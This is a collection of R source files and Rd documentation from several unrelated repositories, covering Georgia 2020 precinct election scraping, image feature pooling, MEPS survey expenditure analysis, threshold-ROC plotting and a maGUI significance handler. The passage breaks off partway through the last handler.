for(j in 1:length(returnPolyData@polygons[[i]]@Polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons[[j]]@coords), length(polygonData@polygons[[i]]@Polygons[[j]]@coords))
}
}
# writePolyShape(returnPolyData, "yaharaData_test")
})
|
# Scrape 2020 precinct-level presidential results for every Georgia county
# from the Clarity election-reporting JSON feeds, assemble one state-wide
# precinct data frame, write it to CSV, and load the matching precinct
# geometry with readOGR().
source("https://raw.githubusercontent.com/jcervas/R-Functions/main/GERRYfunctions.R")
# County result URLs: one Clarity JSON endpoint per county.
# Will eventually replace with full list of URLs
urls <- read.csv("https://raw.githubusercontent.com/jcervas/Georgia-2020/main/Georgia%202020%20Vote%20Links.csv", header = FALSE)
urls <- unlist(urls)
# The four per-ballot-type feeds. No longer necessary: ALL.json has all the
# data aggregated. Kept in case we want to view differences between modes.
votetype.json <- c("Election_Day_Votes", "Absentee_by_Mail_Votes", "Advanced_Voting_Votes", "Provisional_Votes")
# Preallocate one slot per county instead of growing a bare list.
tmp <- vector("list", length(urls))
for (j in seq_along(urls)) {
  cnty.tmp <- jsonlite::fromJSON(paste0(urls[j], "ALL.json"))
  # Last row of the contests table is the county total, so drop it.
  k.list <- length(cnty.tmp$Contests$A) - 1
  dem.tmp <- vector("list", k.list)
  rep.tmp <- vector("list", k.list)
  other.tmp <- vector("list", k.list)
  # seq_len() is safe when k.list is 0 (1:k.list would run 1, 0).
  for (k in seq_len(k.list)) {
    # First candidate vector of contest k: positions 1-3 are the three
    # candidate totals in feed order.
    cnty.tmp.tmp <- unlist(cnty.tmp$Contests$V[[k]][1])
    rep.tmp[[k]] <- cnty.tmp.tmp[1]
    dem.tmp[[k]] <- cnty.tmp.tmp[2]
    other.tmp[[k]] <- cnty.tmp.tmp[3]
  }
  precinct.list <- cnty.tmp$Contests$A
  precinct.list <- precinct.list[seq_len(k.list)]
  # County name is the path segment that follows "GA/" in the feed URL.
  cnty.tmp <- substring(urls[j], regexpr("GA/", urls[j]) + 3)
  county.name <- sub("\\/.*", "", cnty.tmp)
  # One precinct-level table per county.
  tmp[[j]] <- data.frame(state = "Georgia", county = rep(county.name, k.list), precinct = precinct.list, rep = do.call(rbind, rep.tmp), dem = do.call(rbind, dem.tmp), other = do.call(rbind, other.tmp))
}
GA_precincts <- do.call(rbind, tmp)
head(GA_precincts)
GA_precincts$precinct <- toupper(GA_precincts$precinct)
# Two-party Democratic share as an integer percentage; replaceNA()/two_party()
# come from the sourced GERRYfunctions.R.
GA_precincts$dem_TP <- as.integer(100 * round(replaceNA(two_party(GA_precincts$dem, GA_precincts$rep)), 1))
write.csv(GA_precincts, "/Users/user/Google Drive/GitHub/Georgia-2020/GA_precincts_pres.csv", row.names = FALSE)
# We also need precinct shapefiles to match on.
# https://doi.org/10.7910/DVN/XPW7T7
# library(rgdal)
u <- "https://raw.githubusercontent.com/jcervas/Georgia-2020/main/ga_2020_general.json"
# downloader::download(url = u, destfile = "/tmp/ga.GeoJSON")
# ga <- readOGR(dsn = "/tmp/ga.GeoJSON", layer = "OGRGeoJSON")
ga <- readOGR(dsn = u, layer = "ga_2020_general")
plot(ga) | /maincode_GA.R | no_license | jcervas/Georgia-2020 | R | false | false | 3,073 | r |
# Scrape 2020 precinct-level presidential results for every Georgia county
# from the Clarity election-reporting JSON feeds, assemble one state-wide
# precinct data frame, write it to CSV, and load the matching precinct
# geometry with readOGR().
source("https://raw.githubusercontent.com/jcervas/R-Functions/main/GERRYfunctions.R")
# County result URLs: one Clarity JSON endpoint per county.
# Will eventually replace with full list of URLs
urls <- read.csv("https://raw.githubusercontent.com/jcervas/Georgia-2020/main/Georgia%202020%20Vote%20Links.csv", header = FALSE)
urls <- unlist(urls)
# The four per-ballot-type feeds. No longer necessary: ALL.json has all the
# data aggregated. Kept in case we want to view differences between modes.
votetype.json <- c("Election_Day_Votes", "Absentee_by_Mail_Votes", "Advanced_Voting_Votes", "Provisional_Votes")
# Preallocate one slot per county instead of growing a bare list.
tmp <- vector("list", length(urls))
for (j in seq_along(urls)) {
  cnty.tmp <- jsonlite::fromJSON(paste0(urls[j], "ALL.json"))
  # Last row of the contests table is the county total, so drop it.
  k.list <- length(cnty.tmp$Contests$A) - 1
  dem.tmp <- vector("list", k.list)
  rep.tmp <- vector("list", k.list)
  other.tmp <- vector("list", k.list)
  # seq_len() is safe when k.list is 0 (1:k.list would run 1, 0).
  for (k in seq_len(k.list)) {
    # First candidate vector of contest k: positions 1-3 are the three
    # candidate totals in feed order.
    cnty.tmp.tmp <- unlist(cnty.tmp$Contests$V[[k]][1])
    rep.tmp[[k]] <- cnty.tmp.tmp[1]
    dem.tmp[[k]] <- cnty.tmp.tmp[2]
    other.tmp[[k]] <- cnty.tmp.tmp[3]
  }
  precinct.list <- cnty.tmp$Contests$A
  precinct.list <- precinct.list[seq_len(k.list)]
  # County name is the path segment that follows "GA/" in the feed URL.
  cnty.tmp <- substring(urls[j], regexpr("GA/", urls[j]) + 3)
  county.name <- sub("\\/.*", "", cnty.tmp)
  # One precinct-level table per county.
  tmp[[j]] <- data.frame(state = "Georgia", county = rep(county.name, k.list), precinct = precinct.list, rep = do.call(rbind, rep.tmp), dem = do.call(rbind, dem.tmp), other = do.call(rbind, other.tmp))
}
GA_precincts <- do.call(rbind, tmp)
head(GA_precincts)
GA_precincts$precinct <- toupper(GA_precincts$precinct)
# Two-party Democratic share as an integer percentage; replaceNA()/two_party()
# come from the sourced GERRYfunctions.R.
GA_precincts$dem_TP <- as.integer(100 * round(replaceNA(two_party(GA_precincts$dem, GA_precincts$rep)), 1))
write.csv(GA_precincts, "/Users/user/Google Drive/GitHub/Georgia-2020/GA_precincts_pres.csv", row.names = FALSE)
# We also need precinct shapefiles to match on.
# https://doi.org/10.7910/DVN/XPW7T7
# library(rgdal)
u <- "https://raw.githubusercontent.com/jcervas/Georgia-2020/main/ga_2020_general.json"
# downloader::download(url = u, destfile = "/tmp/ga.GeoJSON")
# ga <- readOGR(dsn = "/tmp/ga.GeoJSON", layer = "OGRGeoJSON")
ga <- readOGR(dsn = u, layer = "ga_2020_general")
plot(ga)
getImageFeature <- function(anImage, nPatches, nDivs) {
  # Pooled feature vector for an image: each column of `anImage` is one
  # layer stored as a column-major flattening of a sqrt(nPatches) x
  # sqrt(nPatches) patch grid. The grid is split into (nDivs/2) x (nDivs/2)
  # equal square cells and each cell is summed.
  #
  # Args:
  #   anImage:  numeric matrix, nPatches rows, one column per layer.
  #   nPatches: patches per layer; must be a perfect square.
  #   nDivs:    total number of divisions; nDivs/2 cells per axis, so the
  #             grid side must be divisible by nDivs/2.
  #
  # Returns: numeric vector of length ncol(anImage) * (nDivs/2)^2, ordered
  #   by layer, then cell row, then cell column.
  side <- sqrt(nPatches)
  cellsPerAxis <- nDivs / 2
  len <- side / cellsPerAxis  # cell side length; invariant across layers
  # Preallocate: growing the vector one element at a time is O(n^2).
  imgFeature <- numeric(ncol(anImage) * cellsPerAxis^2)
  fCounter <- 1
  for (i in seq_len(ncol(anImage))) {
    imgLayerMatrix <- matrix(data = anImage[, i], nrow = side, ncol = side)
    for (j in seq_len(cellsPerAxis)) {
      rowInd <- (j - 1) * len + 1
      for (k in seq_len(cellsPerAxis)) {
        colInd <- (k - 1) * len + 1
        subMatrix <- imgLayerMatrix[rowInd:(rowInd + len - 1), colInd:(colInd + len - 1)]
        imgFeature[fCounter] <- sum(subMatrix)
        fCounter <- fCounter + 1
      }
    }
  }
  return(imgFeature)
}
| /code/utils/getImageFeature.R | no_license | ngopee/10-601-project | R | false | false | 664 | r | getImageFeature <- function(anImage, nPatches, nDivs) {
# nDivs: total number of divisions
fCounter <- 1
imgFeature <- vector()
for(i in 1:ncol(anImage)) {
anImgLayer <- anImage[, i]
imgLayerMatrix <- matrix(data = anImgLayer, nrow = sqrt(nPatches), ncol = sqrt(nPatches))
len <- nrow(imgLayerMatrix) / (nDivs/2)
for(j in 1:(nDivs/2)) {
rowInd <- (j-1)*len + 1
for(k in 1:(nDivs/2)) {
colInd <- (k-1)*len + 1
subMatrix <- imgLayerMatrix[rowInd:(rowInd+len-1), colInd:(colInd+len-1)]
imgFeature[fCounter] <- sum(subMatrix)
fCounter <- fCounter + 1
}
}
}
return(imgFeature)
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/CoordCollapse.R
\name{CoordCollapse}
\alias{CoordCollapse}
\title{Removes duplicate geographic locations and binds coordinates into a single element}
\usage{
CoordCollapse(longs, lats)
}
\arguments{
\item{longs}{- Longitudinal coordinates of occurrences in decimal degrees}
\item{lats}{- Latitudinal coordinates of occurrences in decimal degrees}
}
\value{
Returns a 2-column array of coordinates without any duplicate locations
}
\description{
Removes duplicate geographic locations and binds coordinates into a single element
}
\note{
Points are truncated to the hundredths place before checking for duplicates
}
\examples{
longs<-c(34,133,-45)
lats<-c(-12,44,76)
CoordCollapse(longs,lats)
}
| /man/CoordCollapse.Rd | no_license | cran/GeoRange | R | false | true | 800 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/CoordCollapse.R
\name{CoordCollapse}
\alias{CoordCollapse}
\title{Removes duplicate geographic locations and binds coordinates into a single element}
\usage{
CoordCollapse(longs, lats)
}
\arguments{
\item{longs}{- Longitudinal coordinates of occurrences in decimal degrees}
\item{lats}{- Latitudinal coordinates of occurrences in decimal degrees}
}
\value{
Returns a 2-column array of coordinates without any duplicate locations
}
\description{
Removes duplicate geographic locations and binds coordinates into a single element
}
\note{
Points are truncated to the hundredths place before checking for duplicates
}
\examples{
longs<-c(34,133,-45)
lats<-c(-12,44,76)
CoordCollapse(longs,lats)
}
|
# ---------------------------------------------------------------------------
# MEPS 2008: mean expenditure per person, by medical condition and age group.
# Builds a person-level file of expenditures summed across all event types,
# then estimates survey-weighted means with the `survey` package.
# NOTE(review): `condition_codes` (CCS code -> condition lookup) is not
# defined in this script; it must be supplied upstream -- confirm source.
# ---------------------------------------------------------------------------
# Install and load packages
package_names <- c("survey","dplyr","foreign","devtools")
lapply(package_names, function(x) if(!x %in% installed.packages()) install.packages(x))
lapply(package_names, require, character.only=T)
install_github("e-mitchell/meps_r_pkg/MEPS")
library(MEPS)
# Make variance estimation tolerate strata with a single PSU.
options(survey.lonely.psu="adjust")
# Load FYC file
# h121.ssp: full-year consolidated person-level file (2008 per `year` below).
FYC <- read.xport('C:/MEPS/h121.ssp');
year <- 2008
# Older panels use year-suffixed design/weight names; harmonize them here.
if(year <= 2001) FYC <- FYC %>% mutate(VARPSU = VARPSU08, VARSTR=VARSTR08)
if(year <= 1998) FYC <- FYC %>% rename(PERWT08F = WTDPER08)
if(year == 1996) FYC <- FYC %>% mutate(AGE42X = AGE2X, AGE31X = AGE1X)
# Negative age values are missing codes; AGELAST = last non-missing age
# among end-of-year, round 4/2, and round 3/1 ages.
FYC <- FYC %>%
mutate_at(vars(starts_with("AGE")),funs(replace(., .< 0, NA))) %>%
mutate(AGELAST = coalesce(AGE08X, AGE42X, AGE31X))
# Constant indicator used as an "all persons" grouping column.
FYC$ind = 1
# Age groups
# To compute for all age groups, replace 'agegrps' in the 'svyby' function with 'agegrps_v2X' or 'agegrps_v3X'
FYC <- FYC %>%
mutate(agegrps = cut(AGELAST,
breaks = c(-1, 4.5, 17.5, 44.5, 64.5, Inf),
labels = c("Under 5","5-17","18-44","45-64","65+"))) %>%
mutate(agegrps_v2X = cut(AGELAST,
breaks = c(-1, 17.5 ,64.5, Inf),
labels = c("Under 18","18-64","65+"))) %>%
mutate(agegrps_v3X = cut(AGELAST,
breaks = c(-1, 4.5, 6.5, 12.5, 17.5, 18.5, 24.5, 29.5, 34.5, 44.5, 54.5, 64.5, Inf),
labels = c("Under 5", "5-6", "7-12", "13-17", "18", "19-24", "25-29",
"30-34", "35-44", "45-54", "55-64", "65+")))
# Keep only needed variables from FYC
FYCsub <- FYC %>% select(agegrps,ind, DUPERSID, PERWT08F, VARSTR, VARPSU)
# Load event files
# h118a..h: 2008 event files -- RX, dental, inpatient, ER, outpatient,
# office-based, home health (per the variable names below).
RX <- read.xport('C:/MEPS/h118a.ssp')
DVT <- read.xport('C:/MEPS/h118b.ssp')
IPT <- read.xport('C:/MEPS/h118d.ssp')
ERT <- read.xport('C:/MEPS/h118e.ssp')
OPT <- read.xport('C:/MEPS/h118f.ssp')
OBV <- read.xport('C:/MEPS/h118g.ssp')
HHT <- read.xport('C:/MEPS/h118h.ssp')
# Define sub-levels for office-based and outpatient
# NOTE(review): SEEDOC presumably flags whether a physician was seen
# (1 = doctor, 2 = non-doctor sub-level) -- confirm against MEPS codebook.
OBV <- OBV %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OBD', '2' = 'OBO'))
OPT <- OPT %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OPY', '2' = 'OPZ'))
# Sum RX purchases for each event
RX <- RX %>%
rename(EVNTIDX = LINKIDX) %>%
group_by(DUPERSID,EVNTIDX) %>%
summarise_at(vars(RXSF08X:RXXP08X),sum) %>%
ungroup
# Stack events (dental visits and other medical not collected for events)
stacked_events <- stack_events(RX, IPT, ERT, OPT, OBV, HHT, keep.vars = c('SEEDOC','event_v2X'))
# Combine payer columns: PR08X and OZ08X aggregate the per-source payment
# variables into "private/Tricare" and "other sources" totals.
stacked_events <- stacked_events %>%
mutate(event = data,
PR08X = PV08X + TR08X,
OZ08X = OF08X + SL08X + OT08X + OR08X + OU08X + WC08X + VA08X)
# Read in event-condition linking file
clink1 = read.xport('C:/MEPS/h118if1.ssp') %>%
select(DUPERSID,CONDIDX,EVNTIDX)
# Read in conditions file and merge with condition_codes, link file
cond <- read.xport('C:/MEPS/h120.ssp') %>%
select(DUPERSID, CONDIDX, CCCODEX) %>%
mutate(CCS_Codes = as.numeric(as.character(CCCODEX))) %>%
left_join(condition_codes, by = "CCS_Codes") %>%
full_join(clink1, by = c("DUPERSID", "CONDIDX")) %>%
distinct(DUPERSID, EVNTIDX, Condition, .keep_all=T)
# Merge events with conditions-link file and FYCsub
# Keep only events with a known condition and non-negative expenditure.
all_events <- full_join(stacked_events, cond, by=c("DUPERSID","EVNTIDX")) %>%
filter(!is.na(Condition),XP08X >= 0) %>%
mutate(count = 1) %>%
full_join(FYCsub, by = "DUPERSID")
# Sum by person, condition, across event
all_pers <- all_events %>%
group_by(agegrps,ind, DUPERSID, VARSTR, VARPSU, PERWT08F, Condition, count) %>%
summarize_at(vars(SF08X, PR08X, MR08X, MD08X, OZ08X, XP08X),sum) %>% ungroup
# Complex-survey design: PSU nested in stratum, person-level weights.
PERSdsgn <- svydesign(
id = ~VARPSU,
strata = ~VARSTR,
weights = ~PERWT08F,
data = all_pers,
nest = TRUE)
# Survey-weighted mean total expenditure by condition and age group.
svyby(~XP08X, by = ~Condition + agegrps, FUN = svymean, design = PERSdsgn)
| /_check/test_code/cond/r_codes/meanEXP_Condition_agegrps_2008.R | permissive | HHS-AHRQ/MEPS-summary-tables | R | false | false | 3,875 | r | # Install and load packages
# ---------------------------------------------------------------------------
# MEPS 2008: mean expenditure per person, by medical condition and age group.
# Builds a person-level file of expenditures summed across all event types,
# then estimates survey-weighted means with the `survey` package.
# NOTE(review): `condition_codes` (CCS code -> condition lookup) is not
# defined in this script; it must be supplied upstream -- confirm source.
# ---------------------------------------------------------------------------
package_names <- c("survey","dplyr","foreign","devtools")
lapply(package_names, function(x) if(!x %in% installed.packages()) install.packages(x))
lapply(package_names, require, character.only=T)
install_github("e-mitchell/meps_r_pkg/MEPS")
library(MEPS)
# Make variance estimation tolerate strata with a single PSU.
options(survey.lonely.psu="adjust")
# Load FYC file
# h121.ssp: full-year consolidated person-level file (2008 per `year` below).
FYC <- read.xport('C:/MEPS/h121.ssp');
year <- 2008
# Older panels use year-suffixed design/weight names; harmonize them here.
if(year <= 2001) FYC <- FYC %>% mutate(VARPSU = VARPSU08, VARSTR=VARSTR08)
if(year <= 1998) FYC <- FYC %>% rename(PERWT08F = WTDPER08)
if(year == 1996) FYC <- FYC %>% mutate(AGE42X = AGE2X, AGE31X = AGE1X)
# Negative age values are missing codes; AGELAST = last non-missing age
# among end-of-year, round 4/2, and round 3/1 ages.
FYC <- FYC %>%
mutate_at(vars(starts_with("AGE")),funs(replace(., .< 0, NA))) %>%
mutate(AGELAST = coalesce(AGE08X, AGE42X, AGE31X))
# Constant indicator used as an "all persons" grouping column.
FYC$ind = 1
# Age groups
# To compute for all age groups, replace 'agegrps' in the 'svyby' function with 'agegrps_v2X' or 'agegrps_v3X'
FYC <- FYC %>%
mutate(agegrps = cut(AGELAST,
breaks = c(-1, 4.5, 17.5, 44.5, 64.5, Inf),
labels = c("Under 5","5-17","18-44","45-64","65+"))) %>%
mutate(agegrps_v2X = cut(AGELAST,
breaks = c(-1, 17.5 ,64.5, Inf),
labels = c("Under 18","18-64","65+"))) %>%
mutate(agegrps_v3X = cut(AGELAST,
breaks = c(-1, 4.5, 6.5, 12.5, 17.5, 18.5, 24.5, 29.5, 34.5, 44.5, 54.5, 64.5, Inf),
labels = c("Under 5", "5-6", "7-12", "13-17", "18", "19-24", "25-29",
"30-34", "35-44", "45-54", "55-64", "65+")))
# Keep only needed variables from FYC
FYCsub <- FYC %>% select(agegrps,ind, DUPERSID, PERWT08F, VARSTR, VARPSU)
# Load event files
# h118a..h: 2008 event files -- RX, dental, inpatient, ER, outpatient,
# office-based, home health (per the variable names below).
RX <- read.xport('C:/MEPS/h118a.ssp')
DVT <- read.xport('C:/MEPS/h118b.ssp')
IPT <- read.xport('C:/MEPS/h118d.ssp')
ERT <- read.xport('C:/MEPS/h118e.ssp')
OPT <- read.xport('C:/MEPS/h118f.ssp')
OBV <- read.xport('C:/MEPS/h118g.ssp')
HHT <- read.xport('C:/MEPS/h118h.ssp')
# Define sub-levels for office-based and outpatient
# NOTE(review): SEEDOC presumably flags whether a physician was seen
# (1 = doctor, 2 = non-doctor sub-level) -- confirm against MEPS codebook.
OBV <- OBV %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OBD', '2' = 'OBO'))
OPT <- OPT %>%
mutate(event_v2X = recode_factor(
SEEDOC, .default = 'Missing', '1' = 'OPY', '2' = 'OPZ'))
# Sum RX purchases for each event
RX <- RX %>%
rename(EVNTIDX = LINKIDX) %>%
group_by(DUPERSID,EVNTIDX) %>%
summarise_at(vars(RXSF08X:RXXP08X),sum) %>%
ungroup
# Stack events (dental visits and other medical not collected for events)
stacked_events <- stack_events(RX, IPT, ERT, OPT, OBV, HHT, keep.vars = c('SEEDOC','event_v2X'))
# Combine payer columns: PR08X and OZ08X aggregate the per-source payment
# variables into "private/Tricare" and "other sources" totals.
stacked_events <- stacked_events %>%
mutate(event = data,
PR08X = PV08X + TR08X,
OZ08X = OF08X + SL08X + OT08X + OR08X + OU08X + WC08X + VA08X)
# Read in event-condition linking file
clink1 = read.xport('C:/MEPS/h118if1.ssp') %>%
select(DUPERSID,CONDIDX,EVNTIDX)
# Read in conditions file and merge with condition_codes, link file
cond <- read.xport('C:/MEPS/h120.ssp') %>%
select(DUPERSID, CONDIDX, CCCODEX) %>%
mutate(CCS_Codes = as.numeric(as.character(CCCODEX))) %>%
left_join(condition_codes, by = "CCS_Codes") %>%
full_join(clink1, by = c("DUPERSID", "CONDIDX")) %>%
distinct(DUPERSID, EVNTIDX, Condition, .keep_all=T)
# Merge events with conditions-link file and FYCsub
# Keep only events with a known condition and non-negative expenditure.
all_events <- full_join(stacked_events, cond, by=c("DUPERSID","EVNTIDX")) %>%
filter(!is.na(Condition),XP08X >= 0) %>%
mutate(count = 1) %>%
full_join(FYCsub, by = "DUPERSID")
# Sum by person, condition, across event
all_pers <- all_events %>%
group_by(agegrps,ind, DUPERSID, VARSTR, VARPSU, PERWT08F, Condition, count) %>%
summarize_at(vars(SF08X, PR08X, MR08X, MD08X, OZ08X, XP08X),sum) %>% ungroup
# Complex-survey design: PSU nested in stratum, person-level weights.
PERSdsgn <- svydesign(
id = ~VARPSU,
strata = ~VARSTR,
weights = ~PERWT08F,
data = all_pers,
nest = TRUE)
# Survey-weighted mean total expenditure by condition and age group.
svyby(~XP08X, by = ~Condition + agegrps, FUN = svymean, design = PERSdsgn)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/show_segplotly.R
\name{show_segplotly}
\alias{show_segplotly}
\title{Plot chlorophyll and secchi data together with matrix outcomes}
\usage{
show_segplotly(
epcdata,
bay_segment = c("OTB", "HB", "MTB", "LTB"),
yrrng = c(1975, 2019),
family = NULL,
partialyr = FALSE
)
}
\arguments{
\item{epcdata}{data frame of epc data returned by \code{\link{read_importwq}}}
\item{bay_segment}{chr string for the bay segment, one of "OTB", "HB", "MTB", "LTB"}
\item{yrrng}{numeric for year range to plot}
\item{family}{optional chr string indicating font family for text labels}
\item{partialyr}{logical indicating if incomplete annual data for the most recent year are approximated by five year monthly averages for each parameter}
}
\value{
An interactive plotly object
}
\description{
Plot chlorophyll and secchi data together with matrix outcomes
}
\details{
This function combines outputs from \code{\link{show_thrplot}} and \code{\link{show_segmatrix}} for a selected bay segment. The plot is interactive and can be zoomed by dragging the mouse pointer over a section of the plot. Information about each cell or value can be seen by hovering over a location in the plot.
}
\examples{
show_segplotly(epcdata)
}
\concept{show}
| /man/show_segplotly.Rd | permissive | mikewessel/tbeptools | R | false | true | 1,309 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/show_segplotly.R
\name{show_segplotly}
\alias{show_segplotly}
\title{Plot chlorophyll and secchi data together with matrix outcomes}
\usage{
show_segplotly(
epcdata,
bay_segment = c("OTB", "HB", "MTB", "LTB"),
yrrng = c(1975, 2019),
family = NULL,
partialyr = FALSE
)
}
\arguments{
\item{epcdata}{data frame of epc data returned by \code{\link{read_importwq}}}
\item{bay_segment}{chr string for the bay segment, one of "OTB", "HB", "MTB", "LTB"}
\item{yrrng}{numeric for year range to plot}
\item{family}{optional chr string indicating font family for text labels}
\item{partialyr}{logical indicating if incomplete annual data for the most recent year are approximated by five year monthly averages for each parameter}
}
\value{
An interactive plotly object
}
\description{
Plot chlorophyll and secchi data together with matrix outcomes
}
\details{
This function combines outputs from \code{\link{show_thrplot}} and \code{\link{show_segmatrix}} for a selected bay segment. The plot is interactive and can be zoomed by dragging the mouse pointer over a section of the plot. Information about each cell or value can be seen by hovering over a location in the plot.
}
\examples{
show_segplotly(epcdata)
}
\concept{show}
|
\name{lines.thres3}
\alias{lines.thres3}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
Add threshold lines to a plot (three-state setting)
}
\description{
The function includes vertical lines for the thresholds and confidence intervals in a plot created with \code{plot.thres3()}.
}
\usage{
\method{lines}{thres3}(x, ci = TRUE, which.boot = c("norm", "perc"),
col = 1, lty = c(1, 2), lwd = 1, \dots)
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{x}{
an object of class \code{thres3}.
}
\item{ci}{
should the confidence intervals be plotted? Default, \code{TRUE}. No confidence intervals will be plotted if \code{x} does not contain one (that is, \code{x$CI} is \code{NULL}).
}
\item{which.boot}{
in case \code{x} contains confidence intervals calculated by bootstrapping, which one should be printed? the user can choose between \code{"norm"} (based on normal distribution) or \code{"perc"} (based on percentiles). Default, \code{"norm"}. This argument is ignored if parametric confidence intervals were calculated.
}
\item{col}{
color for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{lty}{
a 2-dimensional vector containing:
\code{lty[1]}: line type for the thresholds
\code{lty[2]}: line type for the confidence intervals
Default, \code{c(1, 2)}. If \code{length(lty)} is not 2, \code{lty} will be recycled.
}
\item{lwd}{
line width for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{\dots}{
further arguments to be passed to \code{abline()}.
}
}
\value{
With a plot created by \code{plot.thres3} open, this function adds vertical lines for the estimated thresholds and, if requested, their confidence intervals.
}
\references{
Skaltsa K, Jover L, Fuster D, Carrasco JL. (2012). Optimum threshold estimation based on cost function in a multistate diagnostic setting. Statistics in Medicine, 31:1098-1109.
}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
\code{\link{thres3}}, \code{\link{plot.thres3}}
}
\examples{
set.seed(1234)
n <- 100
k1 <- rlnorm(n)
k2 <- rnorm(n, 3, 1)
k3 <- rnorm(n, 5, 1)
rho <- c(1/3, 1/3, 1/3)
# assuming trinormality
start <- c(mean(k1), mean(k3))
thres1 <- thres3(k1, k2, k3, rho, dist1="norm", dist2="norm",
dist3="norm", start=start, ci.method="param")
# not assuming trinormality
start2 <- c(0.05, 0.6, 0.5, 0.95)
set.seed(2014)
thres2 <- thres3(k1, k2, k3, rho, start=start2, B=1000,
ci.method="boot", dist1="lnorm", dist2="norm",
dist3="norm")
plot(thres2, leg.pos="topright", leg.cex=0.8, col=1:4)
lines(thres1, col=5)
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{threshold}
\keyword{plot}% __ONLY ONE__ keyword per line
| /man/lines-thres3.Rd | no_license | cran/ThresholdROC | R | false | false | 2,881 | rd | \name{lines.thres3}
\alias{lines.thres3}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
Add threshold lines to a plot (three-state setting)
}
\description{
The function includes vertical lines for the thresholds and confidence intervals in a plot created with \code{plot.thres3()}.
}
\usage{
\method{lines}{thres3}(x, ci = TRUE, which.boot = c("norm", "perc"),
col = 1, lty = c(1, 2), lwd = 1, \dots)
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{x}{
an object of class \code{thres3}.
}
\item{ci}{
should the confidence intervals be plotted? Default, \code{TRUE}. No confidence intervals will be plotted if \code{x} does not contain one (that is, \code{x$CI} is \code{NULL}).
}
\item{which.boot}{
in case \code{x} contains confidence intervals calculated by bootstrapping, which one should be printed? the user can choose between \code{"norm"} (based on normal distribution) or \code{"perc"} (based on percentiles). Default, \code{"norm"}. This argument is ignored if parametric confidence intervals were calculated.
}
\item{col}{
color for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{lty}{
a 2-dimensional vector containing:
\code{lty[1]}: line type for the thresholds
\code{lty[2]}: line type for the confidence intervals
Default, \code{c(1, 2)}. If \code{length(lty)} is not 2, \code{lty} will be recycled.
}
\item{lwd}{
line width for the thresholds and their corresponding confidence intervals. Default, 1.
}
\item{\dots}{
further arguments to be passed to \code{abline()}.
}
}
\value{
With a \code{plot.thres3} open, this function adds lines for the required threshold estimates.
}
\references{
Skaltsa K, Jover L, Fuster D, Carrasco JL. (2012). Optimum threshold estimation based on cost function in a multistate diagnostic setting. Statistics in Medicine, 31:1098-1109.
}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
\code{\link{thres3}}, \code{\link{plot.thres3}}
}
\examples{
set.seed(1234)
n <- 100
k1 <- rlnorm(n)
k2 <- rnorm(n, 3, 1)
k3 <- rnorm(n, 5, 1)
rho <- c(1/3, 1/3, 1/3)
# assuming trinormality
start <- c(mean(k1), mean(k3))
thres1 <- thres3(k1, k2, k3, rho, dist1="norm", dist2="norm",
dist3="norm", start=start, ci.method="param")
# not assuming trinormality
start2 <- c(0.05, 0.6, 0.5, 0.95)
set.seed(2014)
thres2 <- thres3(k1, k2, k3, rho, start=start2, B=1000,
ci.method="boot", dist1="lnorm", dist2="norm",
dist3="norm")
plot(thres2, leg.pos="topright", leg.cex=0.8, col=1:4)
lines(thres1, col=5)
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{threshold}
\keyword{plot}% __ONLY ONE__ keyword per line
|
# maGUI handler: extract statistically significant probes per platform.
#
# For every platform whose limma fit object ("*.f") exists in the workspace
# (Affymetrix; Agilent one-/two-color; Illumina BeadArray; Illumina lumi;
# NimbleGen; series-matrix; online data) this handler:
#   1. pulls a toptable from the fit, trying coef = 2, then 3, then 4, and
#      finally the default coefficient (first call that does not error wins);
#   2. keeps the probes with P.Value <= 0.01;
#   3. stores the matching rows of the platform's normalized expression
#      matrix in a global "*.s" object (indexing by row name first, falling
#      back to numeric indices);
#   4. adds a "Stat_Significant" node to the GUI tree and redraws it.
#
# Args:
#   h, ...: gWidgets handler arguments (not used directly).
#
# Side effects: assigns `ttx` and the per-platform "*.s" matrices with `<<-`,
# rebuilds the gWidgets tree `tr`, updates the navigation list `l`, and
# calls display() once per processed platform.
stat_sign<-function(h,...){
  # Bring the platform objects from the enclosing maGUI environment into
  # scope; references to objects that do not exist fail inside try() and
  # are silently ignored.
  try(({
    dat2Affy.f<-dat2Affy.f;datAgOne2.f<-datAgOne2.f;datAgTwo2.f<-datAgTwo2.f;datIllBA2.f<-datIllBA2.f;
    lumi_NQ.f<-lumi_NQ.f;data.matrix_Nimblegen2.f<-data.matrix_Nimblegen2.f;
    data.matrixNorm.f<-data.matrixNorm.f;data.matrix_onlineNorm.f<-data.matrix_onlineNorm.f;
    use.dat2Affy.m<-use.dat2Affy.m;use.datAgOne2.m<-use.datAgOne2.m;use.datAgTwo2.m<-use.datAgTwo2.m;
    use.datIllBA2.m2<-use.datIllBA2.m2;use.lumi_NQ.m<-use.lumi_NQ.m;
    use.data.matrix_Nimblegen2.m<-use.data.matrix_Nimblegen2.m;
    use.data.matrixNorm.m<-use.data.matrixNorm.m;use.data.matrix_onlineNorm.m<-use.data.matrix_onlineNorm.m;l<-l;tree<-tree;
  }),silent=TRUE)
  # Platform-present flags: non-zero length means the fit object exists.
  aa<-0;bb<-0;cc<-0;dd<-0;ee<-0;ff<-0;gg<-0;hh<-0
  try(({
    if(exists("dat2Affy.f"))aa<-length(dat2Affy.f)
    if(exists("datAgOne2.f"))bb<-length(datAgOne2.f)
    if(exists("datAgTwo2.f"))cc<-length(datAgTwo2.f)
    if(exists("datIllBA2.f"))dd<-length(datIllBA2.f)
